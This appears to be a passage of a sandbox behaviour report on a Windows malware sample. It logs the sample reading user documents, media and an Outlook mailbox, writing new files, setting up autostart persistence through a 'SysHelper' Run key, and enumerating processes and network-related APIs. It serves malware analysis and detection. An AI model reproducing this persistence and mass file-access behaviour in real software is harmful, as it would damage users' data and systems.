Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\eFGyeqngF0yupS6aQiTk.mkv size = 153605, size_out = 69373 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\HuEJMg3KiSp.avi size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\HuEJMg3KiSp.avi size = 153605, size_out = 39700 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\0JOcjFAlZN.flv size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\0JOcjFAlZN.flv size = 153605, size_out = 85298 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\7H07rLnEi4jFThR2aq.mp4 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\7H07rLnEi4jFThR2aq.mp4 size = 153605, size_out = 1461 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\ceQR-g1K.flv size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\ceQR-g1K.flv size = 153605, size_out = 90765 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Gtis3rDzqOHJLSemRMN.odp size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Gtis3rDzqOHJLSemRMN.odp size = 153605, size_out = 22037 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\hjjmc6wvdBzNble_jQ.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\hjjmc6wvdBzNble_jQ.m4a size = 153605, size_out = 63814 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\IqxOJCjnMrxHR71kHDep.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\IqxOJCjnMrxHR71kHDep.mp3 size = 153605, size_out = 43397 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\KMX9gyhiVByA4.mp4 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\KMX9gyhiVByA4.mp4 size = 153605, size_out = 46818 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\rX Jr.png size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\rX Jr.png size = 153605, size_out = 77261 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\sKevCgi1Mzg9JDdGUMsM.flv size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\sKevCgi1Mzg9JDdGUMsM.flv size = 153605, size_out = 57330 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\0d9kggXW.pdf size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\0d9kggXW.pdf size = 153605, size_out = 36914 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\aFuREbY291J9.rtf size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\aFuREbY291J9.rtf size = 153605, size_out = 63884 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\bhC_ABvBjR.ods size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\bhC_ABvBjR.ods size = 153605, size_out = 78977 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\hK5LQd-AxtZKvzbn.xlsx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\hK5LQd-AxtZKvzbn.xlsx size = 153605, size_out = 29191 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\lbsR.csv size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\lbsR.csv size = 153605, size_out = 32765 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\mdkvH5k.csv size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\mdkvH5k.csv size = 153605, size_out = 82000 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\pelEM3i4e4Jx_4 Wkx.pdf size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\pelEM3i4e4Jx_4 Wkx.pdf size = 153605, size_out = 26686 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst size = 153605, size_out = 153605 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url size = 153605, size_out = 236 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url size = 153605, size_out = 226 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url size = 153605, size_out = 134 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\z2lk.jpg size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\z2lk.jpg size = 153605, size_out = 53609 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\P1zhXc0ibiHP0Bs2v5.gif size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\P1zhXc0ibiHP0Bs2v5.gif size = 153605, size_out = 13697 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\l6LO.bmp size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\l6LO.bmp size = 153605, size_out = 41349 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\MFSIcW7l5OKlh5.gif size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\MFSIcW7l5OKlh5.gif size = 153605, size_out = 61854 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\WQb DhJ7Wo.jpg size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\WQb DhJ7Wo.jpg size = 153605, size_out = 94060 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\_1-Z0l.gif size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\_1-Z0l.gif size = 153605, size_out = 22528 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\8Vj kyoaTN1vy L0-Vsr.mp4 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\8Vj kyoaTN1vy L0-Vsr.mp4 size = 153605, size_out = 2257 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\9zW0DyjAU1Nrc.mkv size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\9zW0DyjAU1Nrc.mkv size = 153605, size_out = 79987 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\BoizzI4g97t.flv size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\BoizzI4g97t.flv size = 153605, size_out = 69282 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\fXPAxGgq.avi size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\fXPAxGgq.avi size = 153605, size_out = 72319 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\Iq gbMO_n.flv size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\Iq gbMO_n.flv size = 153605, size_out = 19270 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\UtVdyOv5.swf size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\UtVdyOv5.swf size = 153605, size_out = 19504 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\2BSi.ods size = 38, size_out = 38 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_7Xr5yfzUYNnPcQwSd50.xlsx size = 20314 True 1
Fn
Data
For performance reasons, the remaining 605 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (4)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion value_name = SysHelper, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Process (28)
»
Operation Process Additional Information Success Count Logfile
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\userinit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\office14\bcssync.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\rundll32.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows portable devices\fitting attachment.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module (430)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77080000 True 2
Fn
Load RPCRT4.dll base_address = 0x76e70000 True 1
Fn
Load MPR.dll base_address = 0x74f30000 True 1
Fn
Load WININET.dll base_address = 0x75710000 True 1
Fn
Load WINMM.dll base_address = 0x74e00000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77290000 True 1
Fn
Load KERNEL32.dll base_address = 0x77080000 True 1
Fn
Load USER32.dll base_address = 0x76620000 True 1
Fn
Load ADVAPI32.dll base_address = 0x75350000 True 1
Fn
Load SHELL32.dll base_address = 0x75900000 True 1
Fn
Load ole32.dll base_address = 0x754d0000 True 1
Fn
Load OLEAUT32.dll base_address = 0x75630000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x74de0000 True 1
Fn
Load WS2_32.dll base_address = 0x75300000 True 1
Fn
Load DNSAPI.dll base_address = 0x74d80000 True 1
Fn
Load CRYPT32.dll base_address = 0x76f60000 True 1
Fn
Load msvcr100.dll base_address = 0x74cc0000 True 1
Fn
Load Psapi.dll base_address = 0x77190000 True 1
Fn
Load Shell32.dll base_address = 0x75900000 True 58
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x77080000 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\c5878955-7c21-46f7-9950-dbc1d2273e6e\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\c5878955-7c21-46f7-9950-dbc1d2273e6e\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x77094f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7709359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x77091252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x77094208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x77094d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x7711410b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x77114195 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7709d31f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x770aee7e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7775441c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7777c50e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7777c381 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x770af088 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x777605d7 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7777ca24 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77730b8c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x777efde8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77781e1d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x77114761 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x7710cd11 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x7711424f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x771146b1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x77126676 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll address_out = 0x77114751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x771265f1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x771147c1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x771147e1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x771147f1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x770aeee0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x770949d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x77091856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x7709435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x7709186e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x77093519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x770ad802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x77097a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x77091b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x76e91635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x76eb1ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x76eed918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x76eb3fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x76e8f48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x74f32dd6 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x74f32f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x74f33058 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x7572ab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7578be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x7572b406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x757530f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x75735c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x7573f18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x75739197 True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74e026e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x772aa1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x772abb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x772a3248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x772a45bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x772a81ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7729d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x772cad1a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x7709110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x77093587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x77095223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x770953c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x77094435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x770917d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x77095a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x770934c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7709103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x770ac807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x77094259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x77091136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x77095371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x77091282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x770aef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x77091986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x7709588e True 1
Fn
